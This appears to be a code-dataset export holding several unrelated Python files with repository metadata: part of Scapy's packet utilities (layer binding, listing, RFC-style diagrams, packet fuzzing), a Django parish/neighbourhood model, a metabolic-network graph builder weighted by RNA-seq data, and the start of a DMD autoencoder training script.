<Ether dst=ff:ff:ff:ff:ff:ff src=d0:50:99:56:dd:f9 type=0x1234 |<SNAP OUI=0x0 code=0x0 |>> # noqa: E501
"""
if __fval is not None:
fval.update(__fval)
lower.payload_guess = lower.payload_guess[:]
lower.payload_guess.append((fval, upper))
def bind_top_down(lower, # type: Type[Packet]
upper, # type: Type[Packet]
__fval=None, # type: Optional[Any]
**fval # type: Any
):
# type: (...) -> None
"""Bind 2 layers for building.
When the upper layer is added as a payload of the lower layer, all the
arguments will be applied to them.
ex:
>>> bind_top_down(Ether, SNAP, type=0x1234)
>>> Ether()/SNAP()
<Ether type=0x1234 |<SNAP |>>
"""
if __fval is not None:
fval.update(__fval)
upper._overload_fields = upper._overload_fields.copy()
upper._overload_fields[lower] = fval
@conf.commands.register
def bind_layers(lower, # type: Type[Packet]
upper, # type: Type[Packet]
__fval=None, # type: Optional[Dict[str, int]]
**fval # type: Any
):
# type: (...) -> None
"""Bind 2 layers on some specific fields' values.
It makes the packet being built and dissected when the arguments
are present.
This function calls both bind_bottom_up and bind_top_down, with
all passed arguments.
Please have a look at their docs:
- help(bind_bottom_up)
- help(bind_top_down)
"""
if __fval is not None:
fval.update(__fval)
bind_top_down(lower, upper, **fval)
bind_bottom_up(lower, upper, **fval)
def split_bottom_up(lower, # type: Type[Packet]
upper, # type: Type[Packet]
__fval=None, # type: Optional[Any]
**fval # type: Any
):
# type: (...) -> None
"""This call un-links an association that was made using bind_bottom_up.
Have a look at help(bind_bottom_up)
"""
if __fval is not None:
fval.update(__fval)
def do_filter(params, cls):
# type: (Dict[str, int], Type[Packet]) -> bool
params_is_invalid = any(
k not in params or params[k] != v for k, v in six.iteritems(fval)
)
return cls != upper or params_is_invalid
lower.payload_guess = [x for x in lower.payload_guess if do_filter(*x)]
def split_top_down(lower, # type: Type[Packet]
upper, # type: Type[Packet]
__fval=None, # type: Optional[Any]
**fval # type: Any
):
# type: (...) -> None
"""This call un-links an association that was made using bind_top_down.
Have a look at help(bind_top_down)
"""
if __fval is not None:
fval.update(__fval)
if lower in upper._overload_fields:
ofval = upper._overload_fields[lower]
if any(k not in ofval or ofval[k] != v for k, v in six.iteritems(fval)): # noqa: E501
return
upper._overload_fields = upper._overload_fields.copy()
del(upper._overload_fields[lower])
@conf.commands.register
def split_layers(lower, # type: Type[Packet]
upper, # type: Type[Packet]
__fval=None, # type: Optional[Any]
**fval # type: Any
):
# type: (...) -> None
"""Split 2 layers previously bound.
This call un-links calls bind_top_down and bind_bottom_up. It is the opposite of # noqa: E501
bind_layers.
Please have a look at their docs:
- help(split_bottom_up)
- help(split_top_down)
"""
if __fval is not None:
fval.update(__fval)
split_bottom_up(lower, upper, **fval)
split_top_down(lower, upper, **fval)
@conf.commands.register
def explore(layer=None):
# type: (Optional[str]) -> None
"""Function used to discover the Scapy layers and protocols.
It helps to see which packets exists in contrib or layer files.
params:
- layer: If specified, the function will explore the layer. If not,
the GUI mode will be activated, to browse the available layers
examples:
>>> explore() # Launches the GUI
>>> explore("dns") # Explore scapy.layers.dns
>>> explore("http2") # Explore scapy.contrib.http2
>>> explore(scapy.layers.bluetooth4LE)
Note: to search a packet by name, use ls("name") rather than explore.
"""
if layer is None: # GUI MODE
if not conf.interactive:
raise Scapy_Exception("explore() GUI-mode cannot be run in "
"interactive mode. Please provide a "
"'layer' parameter !")
# 0 - Imports
try:
import prompt_toolkit
except ImportError:
raise ImportError("prompt_toolkit is not installed ! "
"You may install IPython, which contains it, via"
" `pip install ipython`")
if not _version_checker(prompt_toolkit, (2, 0)):
raise ImportError("prompt_toolkit >= 2.0.0 is required !")
# Only available with prompt_toolkit > 2.0, not released on PyPi yet
from prompt_toolkit.shortcuts.dialogs import radiolist_dialog, \
button_dialog
from prompt_toolkit.formatted_text import HTML
# Check for prompt_toolkit >= 3.0.0
call_ptk = lambda x: cast(str, x) # type: Callable[[Any], str]
if _version_checker(prompt_toolkit, (3, 0)):
call_ptk = lambda x: x.run() # type: ignore
# 1 - Ask for layer or contrib
btn_diag = button_dialog(
title=six.text_type("Scapy v%s" % conf.version),
text=HTML(
six.text_type(
'<style bg="white" fg="red">Chose the type of packets'
' you want to explore:</style>'
)
),
buttons=[
(six.text_type("Layers"), "layers"),
(six.text_type("Contribs"), "contribs"),
(six.text_type("Cancel"), "cancel")
])
action = call_ptk(btn_diag)
# 2 - Retrieve list of Packets
if action == "layers":
# Get all loaded layers
lvalues = conf.layers.layers()
# Restrict to layers-only (not contribs) + packet.py and asn1*.py
values = [x for x in lvalues if ("layers" in x[0] or
"packet" in x[0] or
"asn1" in x[0])]
elif action == "contribs":
# Get all existing contribs
from scapy.main import list_contrib
cvalues = cast(List[Dict[str, str]], list_contrib(ret=True))
values = [(x['name'], x['description'])
for x in cvalues]
# Remove very specific modules
values = [x for x in values if "can" not in x[0]]
else:
# Escape/Cancel was pressed
return
# Python 2 compat
if six.PY2:
values = [(six.text_type(x), six.text_type(y))
for x, y in values]
# Build tree
if action == "contribs":
# A tree is a dictionary. Each layer contains a keyword
# _l which contains the files in the layer, and a _name
# argument which is its name. The other keys are the subfolders,
# which are similar dictionaries
tree = defaultdict(list) # type: Dict[str, Union[List[Any], Dict[str, Any]]] # noqa: E501
for name, desc in values:
if "." in name: # Folder detected
parts = name.split(".")
subtree = tree
for pa in parts[:-1]:
if pa not in subtree:
subtree[pa] = {}
# one layer deeper
subtree = subtree[pa] # type: ignore
subtree["_name"] = pa # type: ignore
if "_l" not in subtree:
subtree["_l"] = []
subtree["_l"].append((parts[-1], desc)) # type: ignore
else:
tree["_l"].append((name, desc)) # type: ignore
elif action == "layers":
tree = {"_l": values}
# 3 - Ask for the layer/contrib module to explore
current = tree # type: Any
previous = [] # type: List[Dict[str, Union[List[Any], Dict[str, Any]]]] # noqa: E501
while True:
# Generate tests & form
folders = list(current.keys())
_radio_values = [
("$" + name, six.text_type('[+] ' + name.capitalize()))
for name in folders if not name.startswith("_")
] + current.get("_l", []) # type: List[str]
cur_path = ""
if previous:
cur_path = ".".join(
itertools.chain(
(x["_name"] for x in previous[1:]), # type: ignore
(current["_name"],)
)
)
extra_text = (
'\n<style bg="white" fg="green">> scapy.%s</style>'
) % (action + ("." + cur_path if cur_path else ""))
# Show popup
rd_diag = radiolist_dialog(
values=_radio_values,
title=six.text_type(
"Scapy v%s" % conf.version
),
text=HTML(
six.text_type((
'<style bg="white" fg="red">Please select a file'
'among the following, to see all layers contained in'
' it:</style>'
) + extra_text)
),
cancel_text="Back" if previous else "Cancel"
)
result = call_ptk(rd_diag)
if result is None:
# User pressed "Cancel/Back"
if previous: # Back
current = previous.pop()
continue
else: # Cancel
return
if result.startswith("$"):
previous.append(current)
current = current[result[1:]]
else:
# Enter on layer
if previous: # In subfolder
result = cur_path + "." + result
break
# 4 - (Contrib only): load contrib
if action == "contribs":
from scapy.main import load_contrib
load_contrib(result)
result = "scapy.contrib." + result
else: # NON-GUI MODE
# We handle layer as a short layer name, full layer name
# or the module itself
if isinstance(layer, types.ModuleType):
layer = layer.__name__
if isinstance(layer, str):
if layer.startswith("scapy.layers."):
result = layer
else:
if layer.startswith("scapy.contrib."):
layer = layer.replace("scapy.contrib.", "")
from scapy.main import load_contrib
load_contrib(layer)
result_layer, result_contrib = (("scapy.layers.%s" % layer),
("scapy.contrib.%s" % layer))
if result_layer in conf.layers.ldict:
result = result_layer
elif result_contrib in conf.layers.ldict:
result = result_contrib
else:
raise Scapy_Exception("Unknown scapy module '%s'" % layer)
else:
warning("Wrong usage ! Check out help(explore)")
return
# COMMON PART
# Get the list of all Packets contained in that module
try:
all_layers = conf.layers.ldict[result]
except KeyError:
raise Scapy_Exception("Unknown scapy module '%s'" % layer)
# Print
print(conf.color_theme.layer_name("Packets contained in %s:" % result))
rtlst = [] # type: List[Tuple[Union[str, List[str]], ...]]
rtlst = [(lay.__name__ or "", lay._name or "") for lay in all_layers]
print(pretty_list(rtlst, [("Class", "Name")], borders=True))
def _pkt_ls(obj, # type: Union[Packet, Type[Packet]]
verbose=False, # type: bool
):
# type: (...) -> List[Tuple[str, Type[AnyField], str, str, List[str]]] # noqa: E501
"""Internal function used to resolve `fields_desc` to display it.
:param obj: a packet object or class
:returns: a list containing tuples [(name, clsname, clsname_extras,
default, long_attrs)]
"""
is_pkt = isinstance(obj, Packet)
if not issubtype(obj, Packet) and not is_pkt:
raise ValueError
fields = []
for f in obj.fields_desc:
cur_fld = f
attrs = [] # type: List[str]
long_attrs = [] # type: List[str]
while isinstance(cur_fld, (Emph, ConditionalField)):
if isinstance(cur_fld, ConditionalField):
attrs.append(cur_fld.__class__.__name__[:4])
cur_fld = cur_fld.fld
name = cur_fld.name
default = cur_fld.default
if verbose and isinstance(cur_fld, EnumField) \
and hasattr(cur_fld, "i2s"):
if len(cur_fld.i2s or []) < 50:
long_attrs.extend(
"%s: %d" % (strval, numval)
for numval, strval in
sorted(six.iteritems(cur_fld.i2s))
)
elif isinstance(cur_fld, MultiEnumField):
fld_depend = cur_fld.depends_on(
cast(Packet, obj if is_pkt else obj())
)
attrs.append("Depends on %s" % fld_depend)
if verbose:
cur_i2s = cur_fld.i2s_multi.get(
cur_fld.depends_on(
cast(Packet, obj if is_pkt else obj())
), {}
)
if len(cur_i2s) < 50:
long_attrs.extend(
"%s: %d" % (strval, numval)
for numval, strval in
sorted(six.iteritems(cur_i2s))
)
elif verbose and isinstance(cur_fld, FlagsField):
names = cur_fld.names
long_attrs.append(", ".join(names))
elif isinstance(cur_fld, MultipleTypeField):
default = cur_fld.dflt.default
attrs.append(", ".join(
x[0].__class__.__name__ for x in
itertools.chain(cur_fld.flds, [(cur_fld.dflt,)])
))
cls = cur_fld.__class__
class_name_extras = "(%s)" % (
", ".join(attrs)
) if attrs else ""
if isinstance(cur_fld, BitField):
class_name_extras += " (%d bit%s)" % (
cur_fld.size,
"s" if cur_fld.size > 1 else ""
)
fields.append(
(name,
cls,
class_name_extras,
repr(default),
long_attrs)
)
return fields
@conf.commands.register
def ls(obj=None, # type: Optional[Union[str, Packet, Type[Packet]]]
case_sensitive=False, # type: bool
verbose=False # type: bool
):
# type: (...) -> None
"""List available layers, or infos on a given layer class or name.
:param obj: Packet / packet name to use
:param case_sensitive: if obj is a string, is it case sensitive?
:param verbose:
"""
is_string = isinstance(obj, str)
if obj is None or is_string:
tip = False
if obj is None:
tip = True
all_layers = sorted(conf.layers, key=lambda x: x.__name__)
else:
pattern = re.compile(
cast(str, obj),
0 if case_sensitive else re.I
)
# We first order by accuracy, then length
if case_sensitive:
sorter = lambda x: (x.__name__.index(obj), len(x.__name__))
else:
obj = obj.lower()
sorter = lambda x: (x.__name__.lower().index(obj),
len(x.__name__))
all_layers = sorted((layer for layer in conf.layers
if (isinstance(layer.__name__, str) and
pattern.search(layer.__name__)) or
(isinstance(layer.name, str) and
pattern.search(layer.name))),
key=sorter)
for layer in all_layers:
print("%-10s : %s" % (layer.__name__, layer._name))
if tip and conf.interactive:
print("\nTIP: You may use explore() to navigate through all "
"layers using a clear GUI")
else:
try:
fields = _pkt_ls(
obj, # type: ignore
verbose=verbose
)
is_pkt = isinstance(obj, Packet)
# Print
for fname, cls, clsne, dflt, long_attrs in fields:
clsinfo = cls.__name__ + " " + clsne
print("%-10s : %-35s =" % (fname, clsinfo), end=' ')
if is_pkt:
print("%-15r" % (getattr(obj, fname),), end=' ')
print("(%r)" % (dflt,))
for attr in long_attrs:
print("%-15s%s" % ("", attr))
# Restart for payload if any
if is_pkt:
obj = cast(Packet, obj)
if isinstance(obj.payload, NoPayload):
return
print("--")
ls(obj.payload)
except ValueError:
print("Not a packet class or name. Type 'ls()' to list packet classes.") # noqa: E501
@conf.commands.register
def rfc(cls, ret=False, legend=True):
# type: (Type[Packet], bool, bool) -> Optional[str]
"""
Generate an RFC-like representation of a packet def.
:param cls: the Packet class
:param ret: return the result instead of printing (def. False)
:param legend: show text under the diagram (default True)
Ex::
>>> rfc(Ether)
"""
if not issubclass(cls, Packet):
raise TypeError("Packet class expected")
cur_len = 0
cur_line = []
lines = []
# Get the size (width) that a field will take
# when formatted, from its length in bits
clsize = lambda x: 2 * x - 1 # type: Callable[[int], int]
ident = 0 # Fields UUID
# Generate packet groups
for f in cls.fields_desc:
flen = int(f.sz * 8)
cur_len += flen
ident += 1
# Fancy field name
fname = f.name.upper().replace("_", " ")
# The field might exceed the current line or
# take more than one line. Copy it as required
while True:
over = max(0, cur_len - 32) # Exceed
len1 = clsize(flen - over) # What fits
cur_line.append((fname[:len1], len1, ident))
if cur_len >= 32:
# Current line is full. start a new line
lines.append(cur_line)
cur_len = flen = over
fname = "" # do not repeat the field
cur_line = []
if not over:
# there is no data left
break
else:
# End of the field
break
# Add the last line if un-finished
if cur_line:
lines.append(cur_line)
# Calculate separations between lines
seps = []
seps.append("+-" * 32 + "+\n")
for i in range(len(lines) - 1):
# Start with a full line
sep = "+-" * 32 + "+\n"
# Get the line above and below the current
# separation
above, below = lines[i], lines[i + 1]
# The last field of above is shared with below
if above[-1][2] == below[0][2]:
# where the field in "above" starts
pos_above = sum(x[1] for x in above[:-1])
# where the field in "below" ends
pos_below = below[0][1]
if pos_above < pos_below:
# they are overlapping.
# Now crop the space between those pos
# and fill it with " "
pos_above = pos_above + pos_above % 2
sep = (
sep[:1 + pos_above] +
" " * (pos_below - pos_above) +
sep[1 + pos_below:]
)
# line is complete
seps.append(sep)
# Graph
result = ""
# Bytes markers
result += " " + (" " * 19).join(
str(x) for x in range(4)
) + "\n"
# Bits markers
result += " " + " ".join(
str(x % 10) for x in range(32)
) + "\n"
# Add fields and their separations
for line, sep in zip(lines, seps):
result += sep
for elt, flen, _ in line:
result += "|" + elt.center(flen, " ")
result += "|\n"
result += "+-" * (cur_len or 32) + "+\n"
# Annotate with the figure name
if legend:
result += "\n" + ("Fig. " + cls.__name__).center(66, " ")
# return if asked for, else print
if ret:
return result
print(result)
return None
#############
# Fuzzing #
#############
@conf.commands.register
def fuzz(p, # type: Packet
_inplace=0, # type: int
):
# type: (...) -> Packet
"""
Transform a layer into a fuzzy layer by replacing some default values
by random objects.
:param p: the Packet instance to fuzz
:return: the fuzzed packet.
"""
if not _inplace:
p = p.copy()
q = p
while not isinstance(q, NoPayload):
new_default_fields = {}
multiple_type_fields = [] # type: List[str]
for f in q.fields_desc:
if isinstance(f, PacketListField):
for r in getattr(q, f.name):
fuzz(r, _inplace=1)
elif isinstance(f, MultipleTypeField):
# the type of the field will depend on others
multiple_type_fields.append(f.name)
elif f.default is not None:
if not isinstance(f, ConditionalField) or f._evalcond(q):
rnd = f.randval()
if rnd is not None:
new_default_fields[f.name] = rnd
# Process packets with MultipleTypeFields
if multiple_type_fields:
# freeze the other random values
new_default_fields = {
key: (val._fix() if isinstance(val, VolatileValue) else val)
for key, val in six.iteritems(new_default_fields)
}
q.default_fields.update(new_default_fields)
# add the random values of the MultipleTypeFields
for name in multiple_type_fields:
fld = cast(MultipleTypeField, q.get_field(name))
rnd = fld._find_fld_pkt(q).randval()
if rnd is not None:
new_default_fields[name] = rnd
q.default_fields.update(new_default_fields)
q = q.payload
return p
| [
"Tijesuolalekan@gmail.com"
] | Tijesuolalekan@gmail.com |
8470ff9a184b132c991f6f567ce894d7629cc979 | b11efc3a640c948ea67fc5ec48e46888a16bc7be | /taller10/prroyectociudad/ordenamiento/models.py | d7c81de226afc7d904525e4af4496d669fa43efa | [] | no_license | PlataformasWeb-P-AA2021/taller10-Jdesparza | 1850c77d9db21a54249616ea064099588825d0fa | 800abc3826f1cc76a7438e2fc729f385c2a93b96 | refs/heads/main | 2023-06-01T05:29:45.314719 | 2021-06-19T21:18:44 | 2021-06-19T21:18:44 | 378,210,139 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,404 | py | from django.db import models
# Create your models here.
class Parroquia(models.Model):
class Meta:
ordering = ["tipo"]
verbose_name_plural = "Las Parroquias"
opciones_tipo_parroquia = (
('1', 'urbana'),
('2', 'rural'),
)
nombre = models.CharField(max_length=50)
tipo = models.CharField(max_length=30, \
choices=opciones_tipo_parroquia)
def __str__(self):
return "%s - tipo: %s" % (
self.nombre,
self.tipo)
class Barrio(models.Model):
class Meta:
verbose_name_plural = "Los Barrios"
opciones_numero_parques = (
('1', '1'),
('2', '2'),
('3', '3'),
('4', '4'),
('5', '5'),
('6', '6'),
)
nombre = models.CharField(max_length=50)
numero_viviendas = models.IntegerField()
numero_parques = models.CharField(max_length=30, \
choices=opciones_numero_parques)
numero_edificios = models.IntegerField()
parroquia = models.ForeignKey(Parroquia, related_name='losbarrios',
on_delete=models.CASCADE)
def __str__(self):
return "%s - %d - %s - %d - Parroquia(%s)" % (
self.nombre,
self.numero_viviendas,
self.numero_parques,
self.numero_edificios,
self.parroquia.nombre
) | [
"jdesparza@utpl.edu.ec"
] | jdesparza@utpl.edu.ec |
5f1c25a06be984814e4f2bfd1e9b5305d27bfc4c | e32dbfa5951cdddf3e6df50e88ae90d8c23d5389 | /Python_scripts/load_graph.py | ea71197dccf19594cd16189c3ce1b462eef11ff3 | [] | no_license | Auwel1/Integration | a32035d15ee17415a4f3c709979e429bc7857255 | 83c2d0dc53f9f8175b74bc6234574b8e5249b1f8 | refs/heads/main | 2023-06-03T06:47:42.648270 | 2021-06-18T14:41:22 | 2021-06-18T14:41:22 | 378,175,896 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,614 | py | import argparse
from xml.dom import minidom as mdom
from xml.etree import ElementTree as ET
import xml
import pandas as pd
import igraph as ig
import networkx as nx
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import HMA_connect as hma
import utils
from tqdm import tqdm
import re
# parser = argparse.ArgumentParser
#
# parser.add_argument('-xml', '--xmldoc', help='xml metabolic file')
# parser.add_argument('-t', '--trim', help='path to a node list to eliminate from graph')
# parser.add_argument('-o', '--output', help='output directory path')
# parser.add_argument('-n', '--name', help='file name')
# parser.add_argument('-l', '--list', help = 'list of nodes to trim from the graph')
#
# args = parser.parse_args()
def get_RNAseq_csv(csvpath):
data = pd.read_csv(csvpath, index_col= 0, sep= "\t", header = 0)
if len(data.columns) == 0:
data = pd.read_csv(csvpath, index_col=0, sep=",", header=0)
return data
def get_node_list(df_path):
df = pd.read_excel(df_path, index_col=0, engine= 'openpyxl')
nodelist = df['Metabolite Id']
return nodelist
def xml_doc_parsing(path):
"""
:param path: xml species/reaction list pathway
:return:
"""
xml = mdom.parse(path)
xml_nodes = nodes = xml.getElementsByTagName('species')
xml_edges = xml.getElementsByTagName('reaction')
return xml_nodes, xml_edges
def set_metabo_dict(xml_nodes):
metabo_dict = {}
for s in xml_nodes:
attr = s.attributes
species = dict(attr.items())
n = species.pop('id')
metabo_dict[n] = species
return metabo_dict
def extract_reactant_products(xml_listof):
mol_stack = []
if xml_listof is not None:
for i, mol in enumerate(xml_listof):
tmp = dict(mol.attributes.items())
if len(tmp) == 0:
for child in mol.childNodes:
tmp = dict(child.attributes.items())
mol_stack.append(tmp.get('species'))
else:
mol_stack.append(tmp.get('species'))
return mol_stack
def set_reaction_dict(xml_edges):
reaction_dict = {}
for r in xml_edges:
ids = dict(r.attributes.items())
notes = r.getElementsByTagName('notes')
listOfReactants = r.getElementsByTagName('listOfReactants')[0].childNodes
listOfProducts = r.getElementsByTagName('listOfProducts')
n = ids.pop('id')
ids.pop('name')
reactants = extract_reactant_products(listOfReactants)
products = extract_reactant_products(listOfProducts)
supp = notes[0].lastChild.childNodes[0].childNodes[0].data
edge_list = []
for o in reactants:
for t in products:
w = (o, t)
edge_list.append(w)
reaction_dict[n + '_' + ids.get('metaid')] = {'id': ids, 'reaction': edge_list, 'notes': supp}
return reaction_dict
def load_graph(path, csvpath, weights = None, weighting = True):
"""
:param path: path to xml file
:return: a graph in networkx format
"""
xml_nodes, xml_edges = xml_doc_parsing(path)
nodes = set_metabo_dict(xml_nodes)
edges = set_reaction_dict(xml_edges)
if weights == None :
w_edges, gene_list = extract_RNA_weights(edges, csvpath)
else :
w_edges = pd.read_csv(weights, sep = ',')
G = nx.Graph()
G.add_nodes_from(nodes)
for k in edges.keys():
raw_metaid = edges.get(k).get('id').get('metaid')
metaid = raw_metaid.split("_", maxsplit=2)[2]
if w_edges[w_edges['reactions'] == metaid]['weight'].values[0] != 0 :
for e in edges.get(k).get('reaction'):
G.add_edge(*e)
if weighting == True:
G.edges[e[0],e[1]]['weight'] = w_edges[w_edges['reactions'] == metaid]['weight'].values[0]
# plt.subplot()
# nx.draw(G, node_size = 1)
# plt.show()
dict_graph = {'nodes': nodes, 'edges': edges}
return G , gene_list
def graph_trimming(g: nx.Graph, nodelist=None):
nodelist = ['M_'+val for val in nodelist]
print("Before trimming : ",len(g), " nodes and ", len(g.edges), " edges")
if nodelist is not None:
g.remove_nodes_from(nodelist)
g.remove_nodes_from(list(nx.isolates(g)))
print("After trimming : ",len(g), " nodes and ", len(g.edges), " edges")
return g
def load_RNA_data(dfpath):
"""
:param dfpath: pathway to dataframe (csv file)
:return: RNA-seq dataframe
"""
rna_data = pd.read_csv(dfpath, sep='\t')
return rna_data
def getlogFC(gene_id, file):
row = file[file[utils.gene_id_col] == gene_id]
log2FC = None
if not row.empty:
log2FC = row[utils.logFCcol].values
return log2FC
def extract_RNA_weights(edges, csvpath):
weight_table = pd.DataFrame()
weight_col, reaction_col, = list(), list()
gene_list = list()
rna = get_RNAseq_csv(csvpath)
hma.tempting_connection()
print("Weight Attribution")
for r in tqdm(edges.keys(), desc="reaction", total= len(edges.keys())):
raw_metaid = edges.get(r).get('id').get('metaid')
metaid = raw_metaid.split("_", maxsplit = 2)[2]
reaction_col.append(metaid)
try :
s = hma.automatic_request_to_MA("reactions", metaid, "HumanGem")
as_genes = hma.get_ensembl_geneid_list(hma.get_genes(s))
weight_list = list()
weight = 0
for tup in as_genes:
if tup[0] not in gene_list:
gene_list.append(tup[0])
log2FC = getlogFC(tup[0], rna)
print(tup[0], log2FC)
if log2FC is not None:
weight_list.append(float(pow(2,log2FC)))
if len(weight_list) > 0 :
weight = np.mean(weight_list)
weight_col.append(weight)
except :
print("!! WARNING : An error occured during the weight attribution !!")
weight_col.append(0)
weight_table['reactions'] = reaction_col
weight_table['weight'] = weight_col
weight_table.to_csv(utils.out_weight_table)
return weight_table ,gene_list
def saveNxtogml(g:nx.Graph, out):
nx.readwrite.generate_gmlexternal_(g, out)
def genesFromMulti(path):
all = pd.read_csv(path, header =0, sep = '\t' )
trim = all.drop_duplicates('external_gene_name',keep='first')
trim.to_csv(path)
def load_global_graph(path, csvpath, weights = None):
give_weight = False
common_graph = load_graph(path, csvpath, weights, give_weight)
return common_graph
def metabolic_weights(path, ids_table):
table = get_RNAseq_csv(path)
w_list = table[utils.metabo_column]
for m in table.index:
print(m)
m_pat = re.compile(r'.*'+m+'.*')
for m_node in ids_table['metabolite']:
match = re.match(m_pat, m_node)
if match is not None:
print(m,': ',match.string)
if __name__ == "__main__":
# ids = get_RNAseq_csv("/run/media/aurelien/ACOFFE/Stage/integration_job/clusters/AB_clusters_weights.csv")
# metabolic_weights(utils.metabo_path, ids)
nl = get_node_list("/run/media/aurelien/ACOFFE/Stage/integration_job/12859_2020_3564_MOESM1_ESM_modified.xlsx")
g, genes = load_graph(path = "/run/media/aurelien/ACOFFE/Stage/integration_job/data_HMA/"
"U-251MG.xml-91080a939b86d903928cb7e2c321c2ff/U-251 MG.xml",
csvpath= "/run/media/aurelien/ACOFFE/Stage/integration_job/new_result_part3/new_result_part3/tables_deg/"
"control_hypoxie_ldha_ldhb_hypoxie_DEG_significant.tsv")
G = graph_trimming(g, nl)
with open('/run/media/aurelien/ACOFFE/Stage/integration_job/gene_list.txt', 'w') as genelist :
for i in genes :
if i is not None:
genelist.write(i + '\r')
genelist.close()
# nx.write_gml(G,"/run/media/aurelien/ACOFFE/Stage/integration_job/G.gml")
# Ge = ig.Graph.from_networkx(G)
# Ge.write_graphml('/run/media/aurelien/ACOFFE/Stage/integration_job/common.graphml')
# p_g = load_graph(args.xml)
# g = graph_trimming(g, args.trim)
# G = ig.Graph.from_networkx(g)
#
# output = args.output + args.name
# G.write_graphml(output)
# nodes, edges = xml_doc_parsing("/run/media/aurelien/ACOFFE/Stage/integration_job/data_HMA/"
# "U-251MG.xml-91080a939b86d903928cb7e2c321c2ff/U-251 MG.xml")
# extract_RNA_weights("/run/media/aurelien/ACOFFE/Stage/integration_job/data_HMA/"
# "U-251MG.xml-91080a939b86d903928cb7e2c321c2ff/U-251 MG.xml",
# "/run/media/aurelien/ACOFFE/Stage/integration_job/new_result_part3/new_result_part3/tables_deg/"
# "control_hypoxie_ldha_ldhb_hypoxie_DEG_significant.tsv")
#
#
# t = load_graph("/run/media/aurelien/ACOFFE/Stage/integration_job/data_HMA/"
# "U-251MG.xml-91080a939b86d903928cb7e2c321c2ff/U-251 MG.xml")
# nl = get_node_list("/run/media/aurelien/ACOFFE/Stage/integration_job/12859_2020_3564_MOESM1_ESM_modified.xlsx")
# g = graph_trimming(t, nl)
# G = ig.Graph.from_networkx(g)
#
# G.write_graphml('/run/media/aurelien/ACOFFE/Stage/integration_job/Metabo_brain_graph.graphml')
# plt.subplot()
# nx.draw(g, node_size=1)
# plt.show()
# with open('/run/media/aurelien/ACOFFE/Stage/integration_job/Metabo_brain_graph.json', 'w') as out:
# out.write(json.dumps(json_graph.node_link_data(g)))
| [
"aurelien.coffe@gmail.com"
] | aurelien.coffe@gmail.com |
7dd28334fa4623826de128a777c796b19d83a061 | ba057913ba4cc33cd7f12a60dc2b8d161498a15f | /train_fluid_flow_machine.py | 70f22c91daa8ce4dadc09d366fb729af590bc2f9 | [
"MIT"
] | permissive | RahulSundar/dmd_autoencoder | 887de1d28d5001cf3224fc2e5619e01b32764a82 | ec776042f5b6877ee0d6861f8ce1eec30b212efc | refs/heads/main | 2023-01-22T09:34:02.217008 | 2020-12-04T20:23:47 | 2020-12-04T20:23:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,304 | py | """" This module will train dmd autoencoder on fluid flow dataset. """
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
from dmd_machine.dmd_ae_machine import DMDMachine
from dmd_machine.loss_function import LossFunction
from data.Data import DataMaker
from tensorflow import keras
from sklearn.model_selection import train_test_split
from tensorflow.keras.models import model_from_json
from return_stats import *
from create_plots import *
from datetime import date
import pickle
import time
# ======================================================================================================================
# Read in dataset.
# ======================================================================================================================
training_data = pickle.load(open('./data/dataset_fluid.pkl', 'rb'))
data = training_data.data_val
# Network Hyper Parameters.
hyp_params = dict()
hyp_params['num_t_steps'] = training_data.params['num_time_steps']
hyp_params['phys_dim'] = training_data.params["num_physical_dim"]
hyp_params['num_init_conds'] = training_data.params['num_initial_conditions']
hyp_params['batch_size'] = 256
hyp_params['num_epochs'] = 200
# Encoding/Decoding Layer Parameters.
hyp_params['num_en_layers'] = 3
hyp_params['num_en_neurons'] = 80
hyp_params['latent_dim'] = 3
hyp_params['window_size'] = 256
hyp_params['activation'] = 'elu'
hyp_params['weight_initializer'] = 'he_uniform'
hyp_params['bias_initializer'] = 'he_uniform'
hyp_params['ae_output_activation'] = "linear"
hyp_params['hidden_activation'] = "elu"
hyp_params['c1'] = 1 # coefficient auto-encoder loss.
hyp_params['c2'] = 1 # coefficient of dmd loss.
hyp_params['c3'] = 1 # coefficient of pred loss.
save_folder = "AeEx3_" + str(date.today().isoformat()) # save results in the folder " Results/save_folder"-
# including loss curves and plot latent data.
# convert input data from numpy to tensorflow.
input_data = training_data.data_val
all_data = tf.data.Dataset.from_tensor_slices(input_data)
# number of initial conditions in training and testing dataset.
hyp_params['num_init_conds_training'] = int(0.8 * hyp_params['num_init_conds'])
hyp_params['num_init_conds_test'] = hyp_params['num_init_conds'] - hyp_params['num_init_conds_training']
# initialize machine and loss objects.
myMachine = DMDMachine(hyp_params)
# myMachine.autoencoder = keras.models.load_model("./models/my_model_Ex2_oct21", compile=False)
myLoss = LossFunction(hyp_params)
# Learning rate initialization.
hyp_params["initial_learning_rate"] = 3e-3 # MAJOR PARAMETER CHOICE
hyp_params["esteps"] = 30 # MAJOR PARAMETER CHOICE
count = 0
# clear previous run session.
tf.keras.backend.clear_session()
# create folder to save results.
create_new_folders(save_folder)
# save hyperparams in a json file.
save_hyp_params_in_json(hyp_params=hyp_params, json_file_path=os.path.join("results", save_folder, "hyp_params.txt"))
# ======================================================================================================================
# Prepare dataset.
# ======================================================================================================================
# shuffle the dataset and then divide to training vs testing data sets. 80% training .20% testing.
data_train, data_test = train_test_split(input_data, test_size=0.2, random_state=42)
print("dimensions of training dataset (ic x phys_dim x timesteps) = ", np.shape(data_train))
print("dimensions of testing dataset (ic x phys_dim x timesteps) = ", np.shape(data_test))
# ======================================================================================================================
# Unit test to verify that testing and training datasets are disjoint.
# ======================================================================================================================
for ic_train in data_train:
for ic_test in data_test:
if ic_test[:, 0][0] == ic_train[:, 0][0] and ic_test[:, 0][1] == ic_train[:, 0][1]\
and ic_test[:, 0][2] == ic_train[:, 0][2]:
print("Testing and Training datasets intersect!")
print(ic_test[:, 0])
# convert datasets from numpy to tensorflow.
data_train = tf.data.Dataset.from_tensor_slices(data_train)
data_test = tf.data.Dataset.from_tensor_slices(data_test)
# ======================================================================================================================
# Begin training model
# ======================================================================================================================
# initialize loss results (lists) as a function of epoch (iteration).
train_loss_results = []
test_loss_results = []
train_dmd_loss = []
test_dmd_loss = []
train_ae_loss = []
test_ae_loss = []
train_pred_loss = []
test_pred_loss = []
epoch = 0
while epoch < (hyp_params['num_epochs']):
# start timer.
start_time = time.process_time()
# save the total loss of the training data and testing data.
epoch_loss_avg_train = tf.keras.metrics.Mean()
epoch_loss_avg_test = tf.keras.metrics.Mean()
